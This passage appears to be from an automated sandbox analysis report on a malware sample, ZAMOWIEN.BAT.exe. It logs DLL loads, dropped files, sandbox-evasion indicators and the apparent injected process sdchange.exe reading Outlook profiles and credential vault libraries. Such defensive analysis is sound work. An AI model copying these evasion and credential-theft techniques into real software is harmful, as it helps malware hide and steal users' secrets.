          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile written: C:\Windows\Resources\0409\mysterist.iniJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: ZAMOWIEN.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe
          Source: Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.33323827525.000000000825E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_70501B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70501B63
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_70502FD0 push eax; ret 0_2_70502FFE
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D08CD push ecx; mov dword ptr [esp], ecx2_2_376D08D6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373D7403 push cs; ret 2_2_373D740C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373D53AA pushad ; iretd 2_2_373D53AB
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373E5292 push eax; ret 2_2_373E5294
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_373D3E87 push eax; iretd 2_2_373D3E8D
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_00696403 push cs; ret 3_2_0069640C
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_00692E87 push eax; iretd 3_2_00692E8D
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0069EB15 push eax; iretd 3_2_0069EB1B
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_00694FF1 push esi; iretd 3_2_00694FF3
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006943AA pushad ; iretd 3_2_006943AB
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006957A6 pushad ; retf 3_2_006957A7
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_043808CD push ecx; mov dword ptr [esp], ecx4_2_043808D6
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04747403 push cs; ret 4_2_0474740C
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_047467A6 pushad ; retf 4_2_047467A7
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04755292 push eax; ret 4_2_04755294
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_047453AA pushad ; iretd 4_2_047453AB
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04743E87 push eax; iretd 4_2_04743E8D
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_04745FF1 push esi; iretd 4_2_04745FF3
          Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4_2_0474FB15 push eax; iretd 4_2_0474FB1B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dllJump to dropped file
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 879CA43
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 4EDCA43
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 7FF8F2E30594
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 7FF8F2E2FF74
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D6C4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D864
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D004
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D144
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E30594
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D764
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D324
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D364
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D004
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2FF74
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D6C4
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D864
          Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FF8F2E2D604
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 rdtsc 2_2_37711763
          Source: C:\Windows\SysWOW64\sdchange.exeWindow / User API: threadDelayed 9150Jump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dllJump to dropped file
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI coverage: 0.3 %
          Source: C:\Windows\SysWOW64\sdchange.exeAPI coverage: 1.2 %
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068Thread sleep count: 120 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068Thread sleep count: 9150 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068Thread sleep time: -18300000s >= -30000sJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33484954124.00000000076A2000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000002.33592495491.00000000076A2000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33485246567.00000000076A2000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33540907483.00000000076A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4980
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4977
          Source: C:\Windows\SysWOW64\sdchange.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 rdtsc 2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_70501B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70501B63
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F773 mov eax, dword ptr fs:[00000030h]2_2_3778F773
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 mov eax, dword ptr fs:[00000030h]2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 mov eax, dword ptr fs:[00000030h]2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 mov eax, dword ptr fs:[00000030h]2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 mov eax, dword ptr fs:[00000030h]2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 mov eax, dword ptr fs:[00000030h]2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711763 mov eax, dword ptr fs:[00000030h]2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37703740 mov eax, dword ptr fs:[00000030h]2_2_37703740
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h]2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770174A mov eax, dword ptr fs:[00000030h]2_2_3770174A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775174B mov eax, dword ptr fs:[00000030h]2_2_3775174B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775174B mov ecx, dword ptr fs:[00000030h]2_2_3775174B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F9723 mov eax, dword ptr fs:[00000030h]2_2_376F9723
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB705 mov eax, dword ptr fs:[00000030h]2_2_376CB705
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB705 mov eax, dword ptr fs:[00000030h]2_2_376CB705
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB705 mov eax, dword ptr fs:[00000030h]2_2_376CB705
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB705 mov eax, dword ptr fs:[00000030h]2_2_376CB705
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD700 mov ecx, dword ptr fs:[00000030h]2_2_376DD700
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F717 mov eax, dword ptr fs:[00000030h]2_2_3778F717
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779970B mov eax, dword ptr fs:[00000030h]2_2_3779970B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779970B mov eax, dword ptr fs:[00000030h]2_2_3779970B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D77F9 mov eax, dword ptr fs:[00000030h]2_2_376D77F9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D77F9 mov eax, dword ptr fs:[00000030h]2_2_376D77F9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F7CF mov eax, dword ptr fs:[00000030h]2_2_3778F7CF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A17BC mov eax, dword ptr fs:[00000030h]2_2_377A17BC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779D7A7 mov eax, dword ptr fs:[00000030h]2_2_3779D7A7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779D7A7 mov eax, dword ptr fs:[00000030h]2_2_3779D7A7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779D7A7 mov eax, dword ptr fs:[00000030h]2_2_3779D7A7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701796 mov eax, dword ptr fs:[00000030h]2_2_37701796
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701796 mov eax, dword ptr fs:[00000030h]2_2_37701796
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB781 mov eax, dword ptr fs:[00000030h]2_2_377AB781
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB781 mov eax, dword ptr fs:[00000030h]2_2_377AB781
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3660 mov eax, dword ptr fs:[00000030h]2_2_376E3660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3660 mov eax, dword ptr fs:[00000030h]2_2_376E3660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3660 mov eax, dword ptr fs:[00000030h]2_2_376E3660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7662 mov eax, dword ptr fs:[00000030h]2_2_376C7662
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7662 mov eax, dword ptr fs:[00000030h]2_2_376C7662
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7662 mov eax, dword ptr fs:[00000030h]2_2_376C7662
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765660 mov eax, dword ptr fs:[00000030h]2_2_37765660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775166E mov eax, dword ptr fs:[00000030h]2_2_3775166E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775166E mov eax, dword ptr fs:[00000030h]2_2_3775166E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775166E mov eax, dword ptr fs:[00000030h]2_2_3775166E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37705654 mov eax, dword ptr fs:[00000030h]2_2_37705654
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD64A mov eax, dword ptr fs:[00000030h]2_2_376CD64A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD64A mov eax, dword ptr fs:[00000030h]2_2_376CD64A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3640 mov eax, dword ptr fs:[00000030h]2_2_376D3640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF640 mov eax, dword ptr fs:[00000030h]2_2_376EF640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF640 mov eax, dword ptr fs:[00000030h]2_2_376EF640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF640 mov eax, dword ptr fs:[00000030h]2_2_376EF640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D965A mov eax, dword ptr fs:[00000030h]2_2_376D965A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D965A mov eax, dword ptr fs:[00000030h]2_2_376D965A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D7623 mov eax, dword ptr fs:[00000030h]2_2_376D7623
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770F63F mov eax, dword ptr fs:[00000030h]2_2_3770F63F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770F63F mov eax, dword ptr fs:[00000030h]2_2_3770F63F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D5622 mov eax, dword ptr fs:[00000030h]2_2_376D5622
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D5622 mov eax, dword ptr fs:[00000030h]2_2_376D5622
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C mov ecx, dword ptr fs:[00000030h]2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C mov ecx, dword ptr fs:[00000030h]2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C mov eax, dword ptr fs:[00000030h]2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FD600 mov eax, dword ptr fs:[00000030h]2_2_376FD600
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FD600 mov eax, dword ptr fs:[00000030h]2_2_376FD600
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37759603 mov eax, dword ptr fs:[00000030h]2_2_37759603
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F607 mov eax, dword ptr fs:[00000030h]2_2_3778F607
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770360F mov eax, dword ptr fs:[00000030h]2_2_3770360F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C96E0 mov eax, dword ptr fs:[00000030h]2_2_376C96E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C96E0 mov eax, dword ptr fs:[00000030h]2_2_376C96E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D56E0 mov eax, dword ptr fs:[00000030h]2_2_376D56E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D56E0 mov eax, dword ptr fs:[00000030h]2_2_376D56E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D56E0 mov eax, dword ptr fs:[00000030h]2_2_376D56E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377656E0 mov eax, dword ptr fs:[00000030h]2_2_377656E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377656E0 mov eax, dword ptr fs:[00000030h]2_2_377656E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
